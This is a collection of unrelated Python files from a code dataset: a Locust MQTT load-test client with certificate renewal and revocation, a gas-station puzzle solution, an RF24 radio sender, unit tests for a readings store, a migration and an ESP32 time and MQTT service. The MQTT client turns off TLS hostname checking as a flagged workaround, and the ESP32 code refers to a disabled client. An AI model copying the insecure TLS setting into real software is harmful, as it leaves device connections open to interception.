To get this to work, you should call setup() after instantiating\n the class.\n\n Args:\n device_id: device identifier\n run_id: client run identifier\n should_revoke: whether this client should have its certificate revoked\n should_renew: whether this client should have its certificate renewed\n \"\"\"\n Utils.validate_tenant(CONFIG[\"app\"][\"tenant\"])\n Utils.validate_device_id(device_id)\n\n if len(run_id) < 1:\n raise ValueError(\"the run ID must have at least one character\")\n\n if should_renew and should_revoke:\n raise ValueError(\"only one of should_renew and should_revoke can be True\")\n\n self.device_id = device_id\n self.run_id = run_id\n self.should_revoke = should_revoke\n self.should_renew = should_renew\n\n self.is_connected = False\n self.mqttc = None\n\n self.tenant = CONFIG[\"app\"][\"tenant\"]\n self.username = \"\"\n self.topic = \"\"\n self.sub_topic = \"\"\n\n self.device_cert_dir = \"\"\n self.new_cert = None\n\n self.pubmmap = {}\n self.submmap = {}\n\n # Used to count the time between connection and revocation/renovation\n self.start_time = 0\n\n def setup(self) -> None:\n \"\"\"\n Initializes the required parameters.\n \"\"\"\n logging.basicConfig(**CONFIG[\"app\"][\"log_config\"])\n\n self.username = '{0}:{1}'.format(self.tenant, self.device_id)\n self.topic = \"{0}/attrs\".format(self.username)\n self.sub_topic = \"{0}/config\".format(self.username)\n\n self.device_cert_dir = CONFIG[\"security\"][\"cert_dir\"]\n\n # Creating a new certificate if the client was chosen to be revoked\n if self.should_revoke:\n self.device_cert_dir = self.device_cert_dir + CONFIG[\"security\"][\"revoke_cert_dir\"]\n self.new_cert = CertClient.new_cert(self.tenant, self.device_id)\n CertClient.create_cert_files(self.new_cert, self.device_cert_dir)\n\n elif self.should_renew:\n self.device_cert_dir = self.device_cert_dir + CONFIG[\"security\"][\"renew_cert_dir\"]\n self.new_cert = CertClient.new_cert(self.tenant, self.device_id)\n CertClient.create_cert_files(self.new_cert, self.device_cert_dir)\n\n self.configure_mqtt()\n\n def configure_mqtt(self) -> None:\n \"\"\"\n Configures the MQTT connection.\n \"\"\"\n # Certification files\n cert_dir = CONFIG[\"security\"][\"cert_dir\"]\n ca_cert_file = cert_dir + CONFIG[\"security\"][\"ca_cert_file\"]\n cert_file = self.device_cert_dir + CertClient.get_certificate_file(self.device_id)\n key_file = self.device_cert_dir + CertClient.get_private_key_file(self.device_id)\n\n # Configuring MQTT client\n self.mqttc = mqtt.Client(client_id=self.device_id)\n\n # Sets exponential reconnect delay\n self.mqttc.reconnect_delay_set(\n min_delay=CONFIG[\"security\"][\"min_time_reconn\"],\n max_delay=CONFIG[\"security\"][\"max_time_reconn\"]\n )\n\n # Setting up TLS\n self.mqttc.tls_set(ca_cert_file, cert_file, key_file)\n # TODO: investigate the problem when the insecure TLS mode is False\n # This problem seems to happen because the TLS implementation does not\n # expects an IP, but a hostname\n self.mqttc.tls_insecure_set(True)\n\n # Registering MQTT client callbacks\n self.mqttc.on_connect = self.locust_on_connect\n self.mqttc.on_disconnect = self.locust_on_disconnect\n self.mqttc.on_publish = self.locust_on_publish\n self.mqttc.on_subscribe = self.locust_on_subscribe\n self.mqttc.on_message = self.locust_on_message\n\n\n def connect(self) -> None:\n \"\"\"\n Connects to MQTT host.\n \"\"\"\n\n try:\n self.mqttc.connect_async(host=CONFIG['mqtt']['host'], port=CONFIG['mqtt']['port'],\n keepalive=CONFIG['mqtt']['con_timeout'])\n 
self.mqttc.loop_start()\n self.start_time = time.time()\n except Exception as exception:\n logging.error(\"Error while connecting to the broker: %s\", str(exception))\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name='connect',\n response_time=0,\n response_length=0,\n exception=ConnectError(\"disconnected\")\n )\n\n def publishing(self) -> None:\n \"\"\"\n Handles the publishing of messages to MQTT host.\n \"\"\"\n\n payload = {\"timestamp\": time.time()}\n start_time = time.time()\n\n try:\n err, mid = self.mqttc.publish(\n topic=self.topic,\n payload=json.dumps(payload),\n qos=CONFIG['mqtt']['qos']\n )\n\n if err:\n raise ValueError(err)\n\n self.pubmmap[mid] = {\n 'name': MESSAGE_TYPE_PUB,\n 'qos': CONFIG['mqtt']['qos'],\n 'topic': self.topic,\n 'payload': payload,\n 'start_time': start_time,\n 'messages': 'messages'\n }\n\n except Exception as exception:\n error = Utils.error_message(int(str(exception)))\n\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_PUB,\n response_time=Utils.time_delta(start_time, time.time()),\n exception=error\n )\n\n def subscribing(self) -> None:\n \"\"\"\n Handles the subscription in MQTT topics.\n \"\"\"\n\n start_time = time.time()\n\n try:\n err, mid = self.mqttc.subscribe((self.sub_topic, CONFIG['mqtt']['qos']))\n\n if err:\n raise ValueError(err)\n\n self.submmap[mid] = {\n 'name': MESSAGE_TYPE_SUB,\n 'qos': CONFIG['mqtt']['qos'],\n 'topic': self.sub_topic,\n 'payload': \"\",\n 'start_time': start_time,\n 'messages': 'messages'\n }\n\n except Exception as exception:\n error = Utils.error_message(int(str(exception)))\n logging.error(\"Error while subscribing: %s\", error)\n\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_SUB,\n response_time=Utils.time_delta(start_time, time.time()),\n exception=error\n )\n\n\n ###############\n ## Callbacks ##\n ###############\n\n def locust_on_subscribe(\n self,\n _client: mqtt.Client,\n _userdata,\n mid,\n _granted_qos) -> None:\n \"\"\"\n Subscription callback function.\n \"\"\"\n end_time = time.time()\n message = self.submmap.pop(mid, None)\n\n\n if message is None:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_SUB,\n response_time=0,\n exception=ValueError(\"Subscription not found\"),\n )\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=message['name'],\n response_time=Utils.time_delta(message['start_time'], end_time),\n response_length=0\n )\n\n def locust_on_publish(self, _client: mqtt.Client, _userdata, mid) -> None:\n \"\"\"\n Publishing callback function.\n \"\"\"\n end_time = time.time()\n message = self.pubmmap.pop(mid, None)\n\n if message is None:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_PUB,\n response_time=0,\n exception=ValueError(\"Published message could not be found\"),\n )\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=message['name'],\n response_time=Utils.time_delta(message['start_time'], end_time),\n response_length=len(message['payload']),\n )\n\n def locust_on_connect(\n self,\n _client: mqtt.Client,\n _flags_dict,\n _userdata,\n result_code: int) -> None:\n \"\"\"\n Connection callback function.\n \"\"\"\n if result_code == mqtt.MQTT_ERR_SUCCESS:\n self.subscribing()\n self.is_connected = True\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_CONNECT,\n response_time=0,\n response_length=0\n )\n else:\n error = Utils.error_message(result_code)\n 
Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_CONNECT,\n response_time=0,\n exception=DisconnectError(error)\n )\n\n def locust_on_disconnect(self, _client: mqtt.Client, _userdata, result_code: int) -> None:\n \"\"\"\n Disconnection callback function.\n \"\"\"\n if result_code != mqtt.MQTT_ERR_SUCCESS:\n self.is_connected = False\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_DISCONNECT,\n response_time=0,\n exception=DisconnectError(Utils.error_message(result_code))\n )\n\n self.mqttc.reconnect()\n\n @staticmethod\n def locust_on_message(_client: mqtt.Client, _userdata, message: mqtt.MQTTMessage):\n \"\"\"\n Message reception callback function.\n \"\"\"\n if message is not None:\n publish_time = 0.0\n try:\n publish_time = float(json.loads(message.payload.decode())[\"timestamp\"])\n except Exception as exception:\n logging.error(\"Error while parsing the message payload: %s\", str(exception))\n raise Exception(str(exception))\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RECV_MESSAGE,\n response_time=Utils.time_delta(publish_time, time.time()),\n response_length=len(message.payload)\n )\n\n\n #################\n ## Certificate ##\n #################\n def renew_cert(self) -> None:\n \"\"\"\n Renew a certificate and emit an event whether it succeeded or not.\n \"\"\"\n if self.should_renew_now():\n try:\n self.new_cert.renew_cert()\n\n except Exception as exception:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RENEW,\n response_time=0,\n response_length=0,\n exception=exception\n )\n raise Exception(str(exception))\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RENEW,\n response_time=0,\n response_length=0\n )\n self.should_renew = False\n\n def revoke_cert(self) -> None:\n \"\"\"\n Revoke a certificate and emit an event whether it succeeded or not.\n \"\"\"\n if self.should_revoke_now():\n try:\n CertClient.revoke_cert(self.new_cert)\n\n except Exception as exception:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0,\n exception=exception\n )\n raise Exception(str(exception))\n\n else:\n if CertClient.has_been_revoked(self.new_cert):\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0\n )\n self.should_revoke = False\n else:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0,\n exception=CertRevogationError(\"failed to revoke\")\n )\n\n def should_renew_now(self) -> bool:\n \"\"\"\n Verifies if the conditions to renew the certificate were satisfied.\n \"\"\"\n return self.should_renew and \\\n Utils.time_delta(self.start_time, time.time()) >= CONFIG[\"security\"][\"time_to_renew\"]\n\n def should_revoke_now(self) -> bool:\n \"\"\"\n Verifies if the conditions to revoke the certificate were satisfied.\n \"\"\"\n return self.should_revoke and \\\n Utils.time_delta(self.start_time, time.time()) >= CONFIG[\"security\"][\"time_to_revoke\"]\n","sub_path":"locust/src/mqtt_locust/mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":14434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"372349413","text":"\"\"\"\r\nproblem 134. 
Gas Station\r\nhttps://leetcode.com/problems/gas-station/\r\n\r\nsolution:\r\n\r\n\"\"\" \r\n\r\nclass Solution(object):\r\n    def canCompleteCircuit(self, gas, cost):\r\n        \"\"\"\r\n        :type gas: List[int]\r\n        :type cost: List[int]\r\n        :rtype: int\r\n        \"\"\"\r\n        min_index = -1\r\n        min_amount = 0\r\n        total_amount = 0\r\n        for index in range(len(gas)):\r\n            total_amount += gas[index] - cost[index]\r\n            if total_amount < min_amount:\r\n                min_amount = total_amount\r\n                min_index = index\r\n        if total_amount < 0:\r\n            return -1\r\n        else:\r\n            return min_index + 1 if min_index < len(gas) - 1 else 0\r\n\r\n","sub_path":"P0134.py","file_name":"P0134.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"14121110","text":"#! /usr/bin/env python\n# coding=utf8\n################################################################\n\"\"\"\nPython module for sending radio signals in the 2.4 GHz frequency range\n\"\"\"\n################################################################\nfrom RF24 import *\nimport time\n\nclass tx24:\n    def __init__(self):\n        self.radio = RF24(22, 0);\n        self.pipes = [0xF0F0F0F0E1, 0xF0F0F0F0D2]\n        self.millis = lambda: int(round(time.time() * 1000))\n        self.radio.begin()\n        self.radio.enableDynamicPayloads()\n        self.radio.setRetries(5, 15)\n        self.radio.openWritingPipe(self.pipes[1])\n        self.radio.openReadingPipe(1, self.pipes[0])\n    def send(self, message):\n        try:\n            self.radio.stopListening()\n            self.radio.write(message)\n            print(time.strftime(\"%H:%M:%S\")+\"[TX24] Sent: \" + message)\n            self.radio.startListening()\n        except:\n            print(time.strftime(\"%H:%M:%S\")+\"[TX24] An error occurred.\")\nif __name__ == \"__main__\":\n\twhile True:\n\t\tmsg = raw_input()\n\t\ttx24().send(msg)\n\t\t","sub_path":"Smarthome_Slave_RaspberryPi/rf/tx24.py","file_name":"tx24.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"440416853","text":"# Add a reading\n# List readings\n# Get readings for a given serial number\n# Get readings for a given date/time range\n#etc\n\nimport unittest\nimport random\nimport datetime as dt\nfrom pathlib import Path\nfrom stored_readings import StoredReadings\nimport os\nimport sqlite3\nimport pandas as pd\n\nclass TestStoredReadings(unittest.TestCase):\n    def setUp(self):\n        pass\n\n    def test_add_readings(self):\n        print(\"Starting ADD readings test.\")\n        aSR = StoredReadings()\n\n        # Create data to send\n        for i in range(0, 3):\n            x = random.randint(0, 358)\n            y = random.randint(0, 358)\n            z = random.randint(0, 358)\n            d = dt.datetime.now()\n            sn = \"46406064\"\n            aSR.add_readings(sn, d, x, y, z)\n\n\n        n = aSR.get_number_of_readings()\n        print('n = {}'.format(n))\n        # This returns the highest index\n        self.assertTrue(n == 3)\n\n    def test_add_readings_to_db(self):\n        print(\"Starting ADD readings to DB test\")\n        os.chdir('C:\\\\Users\\\\katie\\\\Documents\\\\code\\\\flask-pi-iot')\n        print('This is the current working directory {}'.format(os.getcwd()))\n        aSR = StoredReadings()\n        initial_number = aSR.get_number_of_readings_from_db()\n        # Create data to send\n        for i in range (0, 3):\n            x = random.randint(0, 358)\n            y = random.randint(0, 358)\n            z = random.randint(0, 358)\n            d = dt.datetime.now()\n            sn = \"46406064\"\n            aSR.add_readings_to_db(sn, d, x, y, z)\n\n        ending_number = aSR.get_number_of_readings_from_db()\n        self.assertTrue(ending_number-initial_number==3)\n\n    def test_list_readings(self):\n        
print(\"Starting LIST readings test.\")\n aSR = StoredReadings()\n\n # Create data to send\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = i\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n aSR.list_readings()\n\n def test_get_first_reading(self):\n print(\"Starting FIRST reading test\")\n aSR = StoredReadings()\n\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n\n print(aSR.get_first_reading())\n\n def test_get_next_reading(self):\n print(\"Starting NEXT reading test\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n g=aSR.get_next_reading()\n print(g)\n self.assertTrue(g['x']==1)\n\n def test_get_all_data_as_list(self):\n print(\"Starting GET ALL DATA AS LIST test\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n\n adal = aSR.get_all_data_as_list()\n print(\"adal: {}\".format(adal))\n print(\"type of adal: {}\".format(type(adal)))\n # test the return type is a list\n self.assertTrue(type(adal) == list)\n # test the difference between the length of the list and the number of readings is 0\n lengthAdal = len(adal)\n numberReadings = aSR.get_number_of_readings()\n n = len(adal) - aSR.get_number_of_readings()\n self.assertTrue(n == 0)\n\n # Testing readings to df\n def test_create_dataframe_for_testing(self):\n print(\"Starting READINGS TO DF test.\")\n aSR = StoredReadings()\n # Create an empty dataframe\n df = aSR.create_dataframe_for_testing()\n self.assertTrue(df.shape[0] == 3)\n\n #In progress pass df to turn into list of dicts\n def test_df_to_list_of_dicts(self):\n print(\"Starting DF TO LIST OF DICTS test\")\n aSR = StoredReadings()\n\n test_df = aSR.create_dataframe_for_testing()\n print(\"This is the test_df {}\".format(test_df))\n list_of_dicts = aSR.df_to_list_of_dicts(test_df)\n\n print(\"The type of component in the list {}\".format(type(list_of_dicts[2])))\n self.assertTrue(type(list_of_dicts) == list)\n self.assertTrue(type(list_of_dicts[2]) == dict)\n\n def test_get_df_from_db_by_serial_no(self):\n print(\"Starting get DF from DB test\")\n #this changes the directory so the test will run using the actual codes directory\n os.chdir('C:\\\\Users\\\\katie\\\\Documents\\\\code\\\\flask-pi-iot')\n print('This is the current working directory {}'.format(os.getcwd()))\n aSR = StoredReadings()\n #connecting to database to delete all test records\n conn = sqlite3.connect('data\\\\readings.db')\n cur = conn.cursor()\n sql_string = \"delete from readings where serial_no = 'DFTEST'\"\n cur.execute(sql_string)\n conn.commit()\n conn.close()\n\n # Create data to send\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n d = dt.datetime.now()\n sn = \"DFTEST\"\n aSR.add_readings_to_db(sn, d, x, y, z)\n\n df = aSR.get_df_from_db_by_serial_no(\"DFTEST\")\n print(\"Here is the DF returned from the DB\")\n print(df)\n self.assertTrue(df.shape[0] == 3)\n\n def test_get_unique_serial_no_from_db(self):\n aSR = StoredReadings()\n uniqueSerialNumbers = aSR.get_unique_serial_no_from_db()\n l = len(uniqueSerialNumbers)\n self.assertTrue(l == 4)\n #TODO: Make this more robust because this will fail if data 
changes (ie more unique serial_nos are added)\n\n\n\n\n\n'''\n def test_excel_maker(self):\n print(\"We are making an excel sheet\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n aSR.excel_maker('my_file_name')\n my_file = Path ('./my_file_name.xlsx')\n\n self.assertTrue(my_file.exists())\n'''\n\nif __name__ == '__main__':\n print(\"Starting Tests.\")\n unittest.main()\n\n\n","sub_path":"library/data_storage/test_stored_readings.py","file_name":"test_stored_readings.py","file_ext":"py","file_size_in_byte":6365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429575441","text":"\"\"\"empty message\n\nRevision ID: cbf554e24187\nRevises: 4ac3c4e05668\nCreate Date: 2017-08-01 13:35:21.654982\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cbf554e24187'\ndown_revision = '4ac3c4e05668'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('employees', sa.Column('network_id', sa.String(length=60), nullable=True))\n op.add_column('employees', sa.Column('network_type', sa.String(length=60), nullable=True))\n op.create_index(op.f('ix_employees_network_id'), 'employees', ['network_id'], unique=False)\n op.create_index(op.f('ix_employees_network_type'), 'employees', ['network_type'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_employees_network_type'), table_name='employees')\n op.drop_index(op.f('ix_employees_network_id'), table_name='employees')\n op.drop_column('employees', 'network_type')\n op.drop_column('employees', 'network_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cbf554e24187_.py","file_name":"cbf554e24187_.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181636022","text":"import setuptools\n\nversion = '0.6'\nsetuptools.setup(\n name='uritemplate',\n version=version,\n url='https://pypi.python.org/packages/source/u/uritemplate/uritemplate-%s.tar.gz' % version,\n license='Apache License, Version 2.0',\n author='Joe Gregorio',\n author_email='jcgregorio@google.com'\n)\n","sub_path":"pkgs/python-uritemplate/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"468606163","text":"import gc\nimport time\nimport board\nfrom digitalio import DigitalInOut\nimport json\nimport rtc\n\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_esp32spi import PWMOut\nfrom adafruit_esp32spi.adafruit_esp32spi_wifimanager import ESPSPI_WiFiManager\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nimport adafruit_logging as logging\nimport adafruit_minimqtt as MQTT\nimport adafruit_requests as requests\nimport adafruit_rgbled\n\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"secrets.py not found!\")\n raise\n\nTIME_SERVICE = (\n \"https://io.adafruit.com/api/v2/%s/integrations/time/strftime?x-aio-key=%s\"\n)\n# our strftime is %Y-%m-%d %H:%M:%S.%L %j %u %z %Z see http://strftime.net/ for decoding details\n# See https://apidock.com/ruby/DateTime/strftime for full 
options\nTIME_SERVICE_STRFTIME = (\n \"&fmt=%25Y-%25m-%25d+%25H%3A%25M%3A%25S.%25L+%25j+%25u+%25z+%25Z\"\n)\n\nclass NetworkService:\n def __init__(\n self,\n device_name=\"EnviroPlus\",\n debug=False\n ):\n self.current_time = time.monotonic()\n self.logger = logging.getLogger('enviro+')\n self.device_name = device_name \n self.debug = debug\n self.connected = False\n\n if self.debug:\n self.logger.set_logger_level(\"DEBUG\")\n else:\n self.logger.set_logger_level(\"INFO\")\n\n self._setup_wifi()\n\n def _setup_wifi(self):\n esp32_cs = DigitalInOut(board.D13)\n esp32_reset = DigitalInOut(board.D12)\n esp32_ready = DigitalInOut(board.D11)\n esp32_gpio0 = DigitalInOut(board.D10)\n \n spi = board.SPI()\n self.esp = adafruit_esp32spi.ESP_SPIcontrol(\n spi, esp32_cs, esp32_ready, esp32_reset, esp32_gpio0\n )\n # self._esp._debug = 1\n\n for _ in range(3): # retries\n try:\n self.logger.info(\"ESP firmware: \" + ''.join([chr(b) for b in self.esp.firmware_version]))\n break\n except RuntimeError:\n self.logger.warning(\"Retrying ESP32 connection\")\n time.sleep(1)\n self.esp.reset()\n else:\n self.logger.error(\"Was not able to find ESP32\")\n return\n\n if self.debug:\n while not self.esp.is_connected:\n try:\n self.esp.connect(secrets)\n self.logger.debug(\"IP address is {0}\".format(self.esp.pretty_ip(self.esp.ip_address)))\n except RuntimeError as error:\n self.logger.error(\"Could not connect to internet. {0}\".format(error)) \n\n RED_LED = PWMOut.PWMOut(self.esp, 26)\n GREEN_LED = PWMOut.PWMOut(self.esp, 27)\n BLUE_LED = PWMOut.PWMOut(self.esp, 25)\n status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)\n self.wifi = ESPSPI_WiFiManager(self.esp, secrets, status_light) #, debug=True)\n\n self.wifi.connect()\n\n self.get_local_time()\n\n # MQTT.set_socket(socket, self.esp)\n\n # self.mqtt_client = MQTT.MQTT(broker=secrets['broker'],\n # username=secrets['user'],\n # password=secrets['pass'],\n # is_ssl=False)\n\n if self.debug:\n self.mqtt_client.set_logger_level(\"DEBUG\")\n \n # self.mqtt_client.on_message = self._on_message\n # self.mqtt_client.on_connect = self._on_connect\n # self.mqtt_client.on_disconnect = self._on_disconnected\n # self.mqtt_client.on_publish = self._on_publish\n # self.mqtt_client.on_subscribe = self._on_subscribe\n # self.mqtt_client.on_unsubscribe = self._on_unsubscribe\n \n # self.mqtt_client.connect()\n # self.publish_topic_info()\n # self.mqtt_client.subscribe('homeassistant/sensor/{0}/state'.format(self.device_name))\n\n def _on_message(self, client, topic, message):\n self.logger.debug('MESSAGE: {0}: {1}'.format(topic, message))\n \n def _on_connect(self, client, userdata, flags, rc):\n self.logger.debug('CONNECT: Flags: {0} RC: {1}'.format(flags, rc))\n if rc == 0:\n self.connected = True\n \n def _on_disconnected(self, client, userdata, rc):\n self.logger.debug('DISCONNECT: RC: {0}'.format(rc))\n self._connected = False\n\n def _on_publish(self, client, userdata, topic, pid):\n self.logger.debug('PUBLISH: {0} PID: {1}'.format(topic, pid))\n \n def _on_subscribe(self, client, userdata, topic, granted_qos):\n self.logger.debug('SUBSCRIBE: {0} QOS: {1}'.format(topic, granted_qos))\n \n def _on_unsubscribe(self, client, userdata, topic, pid):\n self.logger.debug('UNSUBSCRIBE: {0} PID: {1}'.format(topic, pid))\n\n def create_payload(self, name, unit, value, uid, model, manufacturer, device_class=None):\n # More info: https://www.home-assistant.io/docs/mqtt/discovery/\n data = {\n \"~\": 'homeassistant/sensor/{0}'.format(self.device_name),\n 
\"name\": '{0}{1}'.format(self.device_name, name),\n \"stat_t\": '~/state'.format(self.device_name),\n \"unit_of_meas\": '{0}'.format(unit),\n \"val_tpl\": '{0}'.format(value),\n \"uniq_id\": '{0}{1}'.format(self.device_name.lower(), uid),\n # \"dev\": {\n # \"ids\": '{0}_sensor'.format(self.device_name.lower()),\n # \"name\": '{0}Sensors'.format(self.device_name),\n # \"mdl\": '{0}'.format(model),\n # \"mf\": '{0}'.format(manufacturer)\n # }\n }\n if device_class:\n data[\"dev_cla\"] = device_class\n \n return json.dumps(data)\n\n def publish_topic_info(self):\n data = self.create_payload(\"Temp\", \"°C\", \"{{ value_json.temperature}}\", \"_sensor_temperature\", \"BME280\", \"Bosch\", device_class=\"temperature\")\n self.logger.debug(\"Sending {0} bytes\".format(len(data)))\n self.mqtt_client.publish(\n 'homeassistant/sensor/{0}/{1}Temp/config'.format(self.device_name, self.device_name),\n data,\n retain=True, qos=1\n )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Humidity/config\",\n # self.create_payload(\"Humidity\", \"%\", \"{{ value_json.humidity}}\", \"_sensor_humidity\", \"BME280\", \"Bosch\", device_class=\"humidity\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Pressure/config\",\n # self.create_payload(\"Pressure\", \"kPa\", \"{{ value_json.pressure}}\", \"_sensor_pressure\", \"BME280\", \"Bosch\", device_class=\"pressure\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Light/config\",\n # self.create_payload(\"Light\", \"lux\", \"{{ value_json.light}}\", \"_sensor_light\", \"LTR-559\", \"Lite-On\", device_class=\"illuminance\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Oxidising/config\",\n # self.create_payload(\"Oxidising\", \"Ohms\", \"{{ value_json.oxidising}}\", \"_sensor_gas_oxidising\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Reducing/config\",\n # self.create_payload(\"Reducing\", \"Ohms\", \"{{ value_json.reducing}}\", \"_sensor_gas_reducing\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"NH3/config\",\n # self.create_payload(\"NH3\", \"Ohms\", \"{{ value_json.nh3}}\", \"_sensor_gas_nh3\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM1/config\",\n # self.create_payload(\"PM1\", \"ug/m3\", \"{{ value_json.pm1}}\", \"_sensor_pm1\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM25/config\",\n # self.create_payload(\"PM2.5\", \"ug/m3\", \"{{ value_json.pm25}}\", \"_sensor_pm25\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM10/config\",\n # self.create_payload(\"PM10\", \"ug/m3\", \"{{ value_json.pm10}}\", \"_sensor_pm10\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n \n def connect_and_send(self, readings):\n if 
len(readings) > 0:\n            self.wifi.connect() \n            # the MQTT client is currently disabled in _setup_wifi; re-enable it\n            # there before restoring the two calls below\n            # self.mqtt_client.connect()\n            # self.mqtt_client.disconnect()\n            self.wifi.disconnect()\n        else:\n            self.logger.warning('No readings, skipping connect')\n\n    def get_local_time(self, location=None):\n        api_url = None\n        try:\n            aio_username = secrets[\"aio_username\"]\n            aio_key = secrets[\"aio_key\"]\n        except KeyError:\n            raise KeyError(\n                \"\\n\\nOur time service requires a login/password to rate-limit. Please register for a free adafruit.io account and place the user/key in your secrets file under 'aio_username' and 'aio_key'\" # pylint: disable=line-too-long\n            )\n\n        location = secrets.get(\"timezone\", location)\n        if location:\n            api_url = (TIME_SERVICE + \"&tz=%s\") % (aio_username, aio_key, location)\n        else: # we'll try to figure it out from the IP address\n            api_url = TIME_SERVICE % (aio_username, aio_key)\n        api_url += TIME_SERVICE_STRFTIME\n        try:\n            response = requests.get(api_url, timeout=10)\n            if response.status_code != 200:\n                raise ValueError(response.text)\n            if self.debug:\n                print(\"Time request: \", api_url)\n                print(\"Time reply: \", response.text)\n            times = response.text.split(\" \")\n            the_date = times[0]\n            the_time = times[1]\n            year_day = int(times[2])\n            week_day = int(times[3])\n            is_dst = None # no way to know yet\n        except KeyError:\n            raise KeyError(\n                \"Was unable to lookup the time, try setting secrets['timezone'] according to http://worldtimeapi.org/timezones\"\n            )\n        year, month, mday = [int(x) for x in the_date.split(\"-\")]\n        the_time = the_time.split(\".\")[0]\n        hours, minutes, seconds = [int(x) for x in the_time.split(\":\")]\n        now = time.struct_time(\n            (year, month, mday, hours, minutes, seconds, week_day, year_day, is_dst)\n        )\n        print(now)\n        rtc.RTC().datetime = now\n\n        # now clean up\n        response.close()\n        response = None\n        gc.collect()\n","sub_path":"network_service.py","file_name":"network_service.py","file_ext":"py","file_size_in_byte":11218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
